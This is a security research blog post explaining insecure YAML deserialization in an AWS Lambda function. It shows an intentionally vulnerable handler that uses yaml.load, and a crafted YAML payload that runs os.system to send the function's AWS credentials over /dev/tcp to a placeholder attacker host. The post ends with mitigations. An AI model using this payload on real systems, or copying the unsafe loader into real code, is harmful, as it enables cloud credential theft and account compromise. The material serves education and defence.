Insecure deserialization in AWS Lambda

At the end of August 2022, I wrote my first article for Contrast Security's blog. It was one of my first tasks in this new job, I am proud of it, and I want to publish it here too. I currently work as a Security Researcher at Contrast Security, where I finally have the opportunity to spend a lot of time "playing" with application security and vulnerabilities for work. I also want to start sharing what I work on, in accordance with my company's sharing policy. Let's start.

At the beginning of December 2021, many companies worldwide were hit by the newly discovered vulnerability known as Log4Shell. Its CVSS score classifies it as critical, and the impact could be very severe for those who do not fix it. Log4Shell falls under CWE-502, Deserialization of Untrusted Data, a category of the Common Weakness Enumeration (CWE), the common language for describing software weaknesses maintained by MITRE. This category of vulnerability is a regular member of the OWASP Top 10 project.

Generally speaking, serialization and deserialization refer to the process of taking program-internal object-related data, packaging it in a way that allows the data to be externally stored or transferred ("serialization"), then extracting the serialized data to reconstruct the original object ("deserialization"). It is often convenient to serialize objects for communication or to save them for later use. However, serialized data or code can often be modified without using the provided accessor functions. If the application does not use cryptography or another specific component to protect and validate the serialized object, it leaves the door open for attackers to tamper with it in order to modify the flow of the application, as happened with the Log4Shell vulnerability.
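The idea of protecting serialized data with cryptography can be sketched as follows. This is a minimal illustration, not code from the demo function: the key, the function names and the "tag.payload" layout are all assumptions made for the example. The object is serialized to JSON, an HMAC-SHA256 tag is attached, and the tag is verified before anything is deserialized.

```python
import hashlib
import hmac
import json

# Hypothetical key for illustration only; a real key would come from a secrets store.
SECRET_KEY = b"demo-key-not-for-production"


def serialize_signed(obj, key=SECRET_KEY):
    """Serialize obj to JSON bytes and prepend an HMAC-SHA256 tag."""
    payload = json.dumps(obj, sort_keys=True).encode("utf-8")
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest().encode("ascii")
    # The hex tag never contains ".", so the first "." separates tag and payload.
    return tag + b"." + payload


def deserialize_verified(blob, key=SECRET_KEY):
    """Verify the tag first, and only then deserialize the payload."""
    tag, sep, payload = blob.partition(b".")
    if not sep:
        raise ValueError("malformed blob")
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode("ascii")
    # compare_digest avoids leaking information through timing differences.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: data was modified")
    return json.loads(payload)
```

With this layout, a blob whose payload was edited after signing is rejected before json.loads() ever sees it. The scheme only helps when the producer of the data is trusted and the key stays secret.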

This kind of attack is a known risk in a classical environment, but it can occur in a serverless architecture as well. When an application uses a specific method to serialize/deserialize objects, the exploitability is the same in both types of applications. However, the impact might be limited in a serverless architecture because the runtime environments are ephemeral, so follow-up activities such as persistence or lateral movement are harder for an attacker. Still, other attacks, like sensitive data exposure (e.g., function code or secret keys), could easily be carried out.

The serialization/deserialization process is common in many different languages such as Java, Python, JavaScript and C#. The libraries involved in this process can also be affected. For example, when the application parses a YAML file or a JSON object, it executes a deserialization process.

To evaluate the real impact of this kind of exploitation, we created a demo Python function that uses the YAML library, and we are going to exploit the insecure deserialization. However, it is important to understand that the PyYAML library used in the article to demonstrate the vulnerability is not part of the standard library bundled with Python 3 (or with the AWS Lambda runtime, tested with Python 3.9), and it needs to be explicitly installed:

import os
import uuid

import boto3
import yaml
from yaml import Loader


def write_data(data):
    # Store each user and their roles as an item in the DynamoDB table
    ddb = boto3.client('dynamodb')
    for user in data:
        roles = [{"S": r} for r in user['roles']]
        ddb.put_item(
            TableName="cn-research-users-yaml-files",
            Item={
                'name': {"S": user['name']},
                'roles': {"L": roles}
            }
        )


def lambda_handler(event, context):
    s3 = boto3.client("s3")
    for e in event['Records']:
        bucket = e['s3']['bucket']['name']
        key = e['s3']['object']['key']

        # Download the uploaded object to a unique path in /tmp
        tmp_path = f"/tmp/{uuid.uuid4()}"
        print(f"downloading file {key} from bucket {bucket} to {tmp_path}")
        s3.download_file(bucket, key, tmp_path)

        if os.path.isfile(tmp_path):
            with open(tmp_path, 'r') as f:
                file_content = f.read()
            # VULNERABLE: the full Loader can construct arbitrary Python
            # objects from untrusted input
            parsed = yaml.load(file_content, Loader)
            write_data(parsed)

    return {
        'statusCode': 200,
        'event': event,
    }

The Lambda function is triggered when a new YAML file is uploaded to an S3 bucket and parses it with yaml.load(), even though the documentation for this library explicitly states that this method is unsafe. The file contains a list of users with their roles, which are then stored in a DynamoDB table.
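For local testing, the part of the S3 notification that the handler reads can be approximated with a trimmed event. The sketch below is an illustration rather than part of the demo function: the helper name, the bucket name and the object key are hypothetical, and a real event carries many more fields. It also decodes the object key, since S3 delivers keys URL-encoded in notifications.

```python
from urllib.parse import unquote_plus


def iter_s3_objects(event):
    """Yield (bucket, key) pairs from an S3 notification event."""
    for record in event.get("Records", []):
        bucket = record["s3"]["bucket"]["name"]
        # Object keys arrive URL-encoded, e.g. a space is delivered as "+".
        key = unquote_plus(record["s3"]["object"]["key"])
        yield bucket, key


# Trimmed, hypothetical event containing only the fields the handler reads.
sample_event = {
    "Records": [
        {
            "s3": {
                "bucket": {"name": "example-bucket"},
                "object": {"key": "uploads/new+users.yaml"},
            }
        }
    ]
}

for bucket, key in iter_s3_objects(sample_event):
    print(f"bucket={bucket} key={key}")
```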

An example of a YAML file:

---
-
  name: Franc
  roles:
  - admin
  - hr
-
  name: John
  roles:
  - admin
  - finance

The structure of the YAML file is not important for the outcome of the exploitation. The vulnerable code is the line where the file is loaded without any kind of verification or sanitization:

parsed = yaml.load(file_content, Loader)

An attacker is able to forge a YAML file to execute remote commands and can thereby exfiltrate sensitive data from the ephemeral container.

Malicious file upload on S3 to trigger the lambda

For example, the following malicious content resides inside the YAML file. <IP> and <PORT> are the IP address and the TCP port of the attacker's host, ready to receive the exfiltrated data.

---
!!python/object/apply:os.system ['echo -e AWS_ACCESS_KEY_ID: $AWS_ACCESS_KEY_ID \\nAWS_SECRET_ACCESS_KEY: $AWS_SECRET_ACCESS_KEY \\nAWS_SESSION_TOKEN: $AWS_SESSION_TOKEN &>/dev/tcp/<IP>/<PORT>']

The information extracted from the Lambda's runtime is its set of AWS keys, which then allows the attacker to interact with the cloud and perform other activities, based on the function's overall permissions.
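The payload works because the Lambda runtime exposes the execution role's temporary credentials to the function process as environment variables, under the same three names the payload echoes. A minimal sketch for checking this from inside a function follows. The helper name is hypothetical, and it deliberately returns only the variable names, never their values.

```python
import os

# Environment variable names under which the Lambda runtime exposes the
# execution role's temporary credentials.
CREDENTIAL_VARS = (
    "AWS_ACCESS_KEY_ID",
    "AWS_SECRET_ACCESS_KEY",
    "AWS_SESSION_TOKEN",
)


def exposed_credential_vars(env=None):
    """Return the credential variable names present in env (names only)."""
    env = os.environ if env is None else env
    return [name for name in CREDENTIAL_VARS if name in env]
```

Any code that runs inside the function, including code injected through a deserialization flaw, can read these variables, which is why the function's permissions define the blast radius.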

In this case, the Lambda function has permission to read files from the S3 bucket and write data to the DynamoDB table. Using the CLI, the attacker can then use the stolen credentials to impersonate the function and download all the files from the bucket, or insert their own user with an elevated role directly into the database table.

How should you avoid insecure deserialization in your serverless environment?

The rule of thumb is to never pass a serialized object from an untrusted source to the deserialize function.
Review third-party libraries before use and avoid using libraries with known vulnerabilities (e.g., CVE-2020-14343). You can also use Contrast Security to identify vulnerable dependencies in your lambda functions.
Contrast Serverless Application Security offers detection capabilities for this vulnerability taxonomy, alerting developers about potential data exposure in their applications during development.
Contrast Security can verify an insecure use of the serialization/deserialization process that can be exploited by an attacker through multiple services, such as S3 or even application programming interfaces (APIs). By using Contrast, your Lambda code will be monitored and verified for every change, and the developer will be alerted to the exploitable issues we detect.
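As a concrete illustration of the first rule, the demo function could parse the uploaded file with PyYAML's safe loader and validate the result before writing it to DynamoDB. The following is a sketch under assumptions, not the fix shipped in the original article: validate_users and parse_users are hypothetical helper names, and the accepted shape is inferred from the example YAML file above.

```python
def validate_users(data):
    """Accept only a list of {'name': str, 'roles': [str, ...]} mappings."""
    if not isinstance(data, list):
        raise ValueError("expected a list of users")
    users = []
    for entry in data:
        if not isinstance(entry, dict) or set(entry) != {"name", "roles"}:
            raise ValueError("each user needs exactly 'name' and 'roles'")
        name, roles = entry["name"], entry["roles"]
        if not isinstance(name, str) or not isinstance(roles, list):
            raise ValueError("invalid field types")
        if not all(isinstance(role, str) for role in roles):
            raise ValueError("roles must be strings")
        users.append({"name": name, "roles": roles})
    return users


def parse_users(file_content):
    """Parse untrusted YAML with the safe loader, then validate its shape."""
    # PyYAML is imported lazily because it must be installed separately.
    import yaml

    # safe_load builds only plain types (dict, list, str, ...) and raises
    # an error on tags such as !!python/object/apply.
    return validate_users(yaml.safe_load(file_content))
```

In the handler, parse_users(file_content) would replace the yaml.load(file_content, Loader) call. The malicious file shown earlier then fails during parsing instead of executing a command.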

References

[1] - Contrast Security's Blog post